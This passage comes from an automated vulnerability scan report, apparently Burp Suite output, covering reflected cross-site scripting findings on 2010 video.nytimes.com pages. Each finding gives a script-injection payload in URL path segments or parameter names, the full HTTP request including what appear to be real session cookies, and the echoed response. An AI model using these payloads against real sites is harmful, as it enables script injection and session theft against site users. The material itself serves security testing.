Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:58:43 GMT
Content-type: text/html
Content-Length: 233605

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/20103a936"><script>alert(1)</script>2e4b7e8b2c/11/08/business/media/1248069229412/chinese-animation-.html">
...[SNIP]...

3.354. http://video.nytimes.com/video/2010/11/08/business/media/1248069229412/chinese-animation-.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/11/08/business/media/1248069229412/chinese-animation-.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 458a9"><script>alert(1)</script>23070bfca68 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/11458a9"><script>alert(1)</script>23070bfca68/08/business/media/1248069229412/chinese-animation-.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:00:25 GMT
Content-type: text/html
Content-Length: 233607

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/11458a9"><script>alert(1)</script>23070bfca68/08/business/media/1248069229412/chinese-animation-.html">
...[SNIP]...

3.355. http://video.nytimes.com/video/2010/11/08/business/media/1248069229412/chinese-animation-.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/11/08/business/media/1248069229412/chinese-animation-.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb372"><script>alert(1)</script>72f3f3a00df was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/11/08bb372"><script>alert(1)</script>72f3f3a00df/business/media/1248069229412/chinese-animation-.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:01:03 GMT
Content-type: text/html
Content-Length: 233607

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/11/08bb372"><script>alert(1)</script>72f3f3a00df/business/media/1248069229412/chinese-animation-.html">
...[SNIP]...

3.356. http://video.nytimes.com/video/2010/11/08/business/media/1248069229412/chinese-animation-.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/11/08/business/media/1248069229412/chinese-animation-.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47374"><script>alert(1)</script>934462cbc09 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/11/08/business/media/1248069229412/chinese-animation-.html?47374"><script>alert(1)</script>934462cbc09=1 HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:54:39 GMT
Content-type: text/html
Content-Length: 230204

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/11/08/business/media/1248069229412/chinese-animation-.html?47374"><script>alert(1)</script>934462cbc09=1">
...[SNIP]...

3.357. http://video.nytimes.com/video/2010/11/08/world/1248069302724/timescast-november-8-2010.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/11/08/world/1248069302724/timescast-november-8-2010.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58e35"><script>alert(1)</script>ff460568664 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/201058e35"><script>alert(1)</script>ff460568664/11/08/world/1248069302724/timescast-november-8-2010.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:56:48 GMT
Content-type: text/html
Content-Length: 233601

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/201058e35"><script>alert(1)</script>ff460568664/11/08/world/1248069302724/timescast-november-8-2010.html">
...[SNIP]...

3.358. http://video.nytimes.com/video/2010/11/08/world/1248069302724/timescast-november-8-2010.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/11/08/world/1248069302724/timescast-november-8-2010.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3612c"><script>alert(1)</script>d316fe1c103 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/11/08/world/1248069302724/timescast-november-8-2010.html?3612c"><script>alert(1)</script>d316fe1c103=1 HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:52:00 GMT
Content-type: text/html
Content-Length: 226362

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/11/08/world/1248069302724/timescast-november-8-2010.html?3612c"><script>alert(1)</script>d316fe1c103=1">
...[SNIP]...

3.359. http://video.nytimes.com/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56611"><script>alert(1)</script>f22e89a31ea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/201056611"><script>alert(1)</script>f22e89a31ea/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:52:45 GMT
Content-type: text/html
Content-Length: 233629

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/201056611"><script>alert(1)</script>f22e89a31ea/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html">
...[SNIP]...

3.360. http://video.nytimes.com/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2aff"><script>alert(1)</script>9782dc0ecdb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/11d2aff"><script>alert(1)</script>9782dc0ecdb/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:53:55 GMT
Content-type: text/html
Content-Length: 233629

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/11d2aff"><script>alert(1)</script>9782dc0ecdb/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html">
...[SNIP]...

3.361. http://video.nytimes.com/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcfaf"><script>alert(1)</script>65ca1884fae was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/11/08dcfaf"><script>alert(1)</script>65ca1884fae/world/europe/1248069280321/troubles-on-russias-lake-baikal.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:54:41 GMT
Content-type: text/html
Content-Length: 233629

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/11/08dcfaf"><script>alert(1)</script>65ca1884fae/world/europe/1248069280321/troubles-on-russias-lake-baikal.html">
...[SNIP]...

3.362. http://video.nytimes.com/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://video.nytimes.com
Path:	/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d62c7"%3b6336dde4090 was submitted in the REST URL parameter 5. This input was echoed as d62c7";6336dde4090 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /video/2010/11/08/worldd62c7"%3b6336dde4090/europe/1248069280321/troubles-on-russias-lake-baikal.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:57:20 GMT
Content-type: text/html
Content-Length: 177120

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="text/javascript">
var user_type = "0";
var s_prop20 = "";
var s_account = "nytimesglobal,nytworldd62c7";6336dde4090";
var dcsvid = "";
var regstatus = "non-registered";
var s_channel = "worldd62c7";6336dde4090";
var s_prop2 = "europe";
var s_prop1 = "multimedia";
</script>
...[SNIP]...

3.363. http://video.nytimes.com/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 852a1"><script>alert(1)</script>4cef5bc96c4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/11/08/world852a1"><script>alert(1)</script>4cef5bc96c4/europe/1248069280321/troubles-on-russias-lake-baikal.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:57:02 GMT
Content-type: text/html
Content-Length: 233629

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/11/08/world852a1"><script>alert(1)</script>4cef5bc96c4/europe/1248069280321/troubles-on-russias-lake-baikal.html">
...[SNIP]...

3.364. http://video.nytimes.com/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://video.nytimes.com
Path:	/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9fbd'%3b341b5b8bae5 was submitted in the REST URL parameter 5. This input was echoed as d9fbd';341b5b8bae5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /video/2010/11/08/worldd9fbd'%3b341b5b8bae5/europe/1248069280321/troubles-on-russias-lake-baikal.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:58:43 GMT
Content-type: text/html
Content-Length: 177120

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
20from%20environmentalists.');
}
function getShareKeywords() {
return( '' );
}
function getShareSection() {
return( 'Video%20Library' );
}
function getShareSectionDisplay() {
return( 'worldd9fbd';341b5b8bae5' );
}
function getShareSubSection() {
return( 'europe' );
}
function getShareByline() { //artist is specific to slide - should actually relate to entire show
return getTitleItem('auth', decode
...[SNIP]...

3.365. http://video.nytimes.com/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c36d9"><script>alert(1)</script>fa5d622a454 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html?c36d9"><script>alert(1)</script>fa5d622a454=1 HTTP/1.1
